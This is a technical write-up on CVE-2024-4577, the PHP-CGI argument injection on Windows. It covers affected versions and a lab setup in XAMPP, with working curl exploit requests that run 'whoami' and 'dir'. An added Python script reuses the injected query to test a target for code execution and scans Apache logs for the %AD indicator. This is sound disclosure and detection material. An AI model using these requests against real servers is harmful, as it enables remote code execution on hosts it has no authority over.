# CVE-2024-4577

CVE-2024-4577 is a PHP CGI <mark style="color:red;">Argument Injection Vulnerability</mark> discovered by [DEVCORE](https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/). On Windows the CGI handler is exposed to the operating system's "Best-Fit" character mapping: a URL-encoded soft hyphen (`%AD`, byte 0xAD) in the query string is converted to a regular hyphen (`-`, 0x2D) when the request is turned into arguments for `php-cgi.exe`, so a remote client can inject command-line options such as `-d`. The vulnerability has been verified on **Windows machines** running in the <mark style="color:red;">**following locales**</mark>:

* Traditional Chinese (Code Page 950)
* Simplified Chinese (Code Page 936)
* Japanese (Code Page 932)

All versions of XAMPP for Windows are vulnerable by default when the host uses one of these locales. The following PHP versions are affected on the **Windows operating system** (fixed in 8.3.8, 8.2.20 and 8.1.29); the end-of-life branches PHP 8.0, 7.x and 5.x are affected as well and receive no fix:

* PHP 8.3 < 8.3.8
* PHP 8.2 < 8.2.20
* PHP 8.1 < 8.1.29

***

### How to setup your own PoC environment

1. On your Windows machine download and install [XAMPP](https://www.apachefriends.org/).
2. Download [mod\_fcgid.so](https://www.apachelounge.com/download/) and copy it into `C:\xampp\apache\modules`
3. Verify that the following block is <mark style="color:red;">**not commented out**</mark> in `C:\xampp\apache\conf\extra\httpd-xampp.conf`, so that `.php` requests are handed to `php-cgi.exe`:

```apacheconf
#
# PHP-CGI setup
#
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
    Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>
```

4. Start the Apache / PHP using XAMPP Control Panel and verify that `CGI/FastCGI` is running.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FoRSST7wk2k8o8CAqAGRh%2Fimage.png?alt=media&#x26;token=22c9500f-accb-47f9-b5ba-4a66ce2636cc" alt=""><figcaption></figcaption></figure>

5. Change the system locale to one of the three locales listed above and reboot the host. This only changes the code page used for non-Unicode programs; the Windows display language stays the same.\
   *Control Panel > Clock and Region > Region > Administrative > Change system locale...*
6. Once rebooted, start the web server again; the target can now be attacked from any host. The `%AD` in the query string is the soft hyphen that Windows maps to `-`, so php-cgi receives `-d allow_url_include=1 -d auto_prepend_file=php://input` and executes the POST body as PHP:

```bash
dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
 Volume in drive C has no label.
 Volume Serial Number is 0AE3-44EE

 Directory of C:\xampp\htdocs

2024-08-14  12:25    <DIR>          .
2024-08-14  10:45    <DIR>          ..
2022-06-15  18:07             3 607 applications.html
2022-06-15  18:07               177 bitnami.css
2024-08-14  10:18    <DIR>          dashboard
2015-07-16  17:32            30 894 favicon.ico
2024-08-14  10:18    <DIR>          img
2015-07-16  17:32               260 index.php
2024-08-14  10:17    <DIR>          webalizer
2024-08-14  10:18    <DIR>          xampp
               4 File(s)         34 938 bytes
               6 Dir(s)  28 033 204 224 bytes free

```
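As an added example that is not part of the original page (and not DEVCORE's code), the following Python script wraps the request from step 6 into a reusable check and shows how that same request looks in an Apache access log. The only thing taken from the page is the query string; the target URL, the marker string, the sample log lines and every function name are assumptions made for this illustration. Instead of running `whoami`, the payload echoes a random marker, so a positive result proves code execution without executing OS commands on the host.

```python
"""
Added example (not from the original page and not DEVCORE's code): a small
CVE-2024-4577 check built around the page's query string, plus a scanner for
the same pattern in Apache access logs. Target URL, marker, log lines and
function names are assumptions made for this illustration.
"""
import re
import secrets
import sys
import urllib.error
import urllib.request

# Query string taken from the page. %AD is U+00AD SOFT HYPHEN; on Windows hosts
# whose system locale is CP936, CP950 or CP932, the best-fit conversion applied
# while building php-cgi's argv turns 0xAD into '-' (0x2D), so this becomes
#   -d allow_url_include=1 -d auto_prepend_file=php://input
INJECTED_QUERY = "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"


def build_poc_url(base_url: str, script: str = "index.php") -> str:
    """Exploit URL for a site root such as http://192.168.101.213/ (assumed)."""
    return f"{base_url.rstrip('/')}/{script}?{INJECTED_QUERY}"


def build_payload(marker: str) -> bytes:
    """POST body that php-cgi prepends and executes (auto_prepend_file=php://input).
    It only echoes a marker and exits, so a hit proves code execution without
    running OS commands on the target."""
    return f"<?php echo '{marker}'; exit; ?>".encode()


def looks_exploited(body: bytes, marker: str) -> bool:
    """True if the marker came back, i.e. our PHP ran on the server."""
    return marker.encode() in body


def check_target(base_url: str, timeout: float = 10.0) -> bool:
    """Send the injected request to a lab host and report whether it executed."""
    marker = "cve-2024-4577-" + secrets.token_hex(8)
    req = urllib.request.Request(
        build_poc_url(base_url),
        data=build_payload(marker),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
    except urllib.error.HTTPError as exc:  # a 500 may still carry our output
        body = exc.read()
    return looks_exploited(body, marker)


# --- detection side: the request line is logged before any decoding ---------
# Apache "combined" format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)
# Same condition as a RewriteCond on %{QUERY_STRING}: an encoded soft hyphen
# anywhere in the query string, case-insensitive.
SOFT_HYPHEN_RE = re.compile(r"%ad", re.IGNORECASE)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.168.101.1 - - [14/Aug/2024:12:25:01 +0200] "POST /index.php?' + INJECTED_QUERY
    + ' HTTP/1.1" 200 21 "-" "curl/8.6.0"',
    '192.168.101.1 - - [14/Aug/2024:12:25:05 +0200] "GET /dashboard/ HTTP/1.1" 200 7549 "-" "Mozilla/5.0"',
    '192.168.101.50 - - [14/Aug/2024:12:26:11 +0200] "GET /index.php?%add+display_errors%3d1 HTTP/1.1" 200 1134 "-" "python-requests/2.32.3"',
]


def flag_log_lines(lines):
    """Return (client_ip, request_uri) for every request carrying %AD in its query."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = m.group("uri")
        _, _, query = uri.partition("?")
        if SOFT_HYPHEN_RE.search(query):
            hits.append((m.group("ip"), uri))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:  # python poc.py http://192.168.101.213/
        target = sys.argv[1]
        print(f"{target}: {'code executed' if check_target(target) else 'no execution'}")
    else:  # offline: scan the constructed sample log
        for ip, uri in flag_log_lines(SAMPLE_LOG):
            print(f"possible CVE-2024-4577 attempt from {ip}: {uri}")
```

Run it with a base URL (`python poc.py http://192.168.101.213/`) against a lab host; with no argument it scans the embedded sample log. Because Apache logs the request line before any decoding, a `%AD` in the query string of a request to a `.php` path is the simplest log indicator of this attack, and the same condition written as an Apache `RewriteCond` on `%{QUERY_STRING}` is the usual stopgap while the PHP upgrade to a fixed version is pending.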
